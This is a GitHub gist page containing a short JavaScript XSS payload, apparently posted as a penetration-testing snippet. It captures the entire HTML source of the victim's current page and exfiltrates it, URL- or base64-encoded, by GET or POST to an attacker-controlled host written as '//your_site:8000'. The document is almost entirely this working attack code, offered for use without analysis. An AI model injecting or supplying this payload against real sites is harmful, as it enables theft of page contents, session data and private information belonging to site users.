Skip to content

Instantly share code, notes, and snippets.

@interference-security

interference-security/send_html_source_using_xss.js

Created June 1, 2018 01:37
Show Gist options
  • Save interference-security/519509c0b8d486986b1abf94c8493f54 to your computer and use it in GitHub Desktop.
Save interference-security/519509c0b8d486986b1abf94c8493f54 to your computer and use it in GitHub Desktop.
Download ZIP
JavaScript code to send HTML+JS source of current page using XSS
Raw
send_html_source_using_xss.js
//Using GET method
//Use it for URL encoded data delivery
d=encodeURI(document.documentElement.outerHTML)
//Use it for base64 encoded data delivery
//d=window.btoa(document.documentElement.outerHTML)
x = new XMLHttpRequest();
x.open("GET","//your_site:8000?d="+d,true)
x.send();
//Using POST method
//Use it for URL encoded data delivery
d=encodeURI(document.documentElement.outerHTML)
//Use it for base64 encoded data delivery
//d=window.btoa(document.documentElement.outerHTML)
x = new XMLHttpRequest();
x.open("POST","//your_site:8000",true)
x.send(d);
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment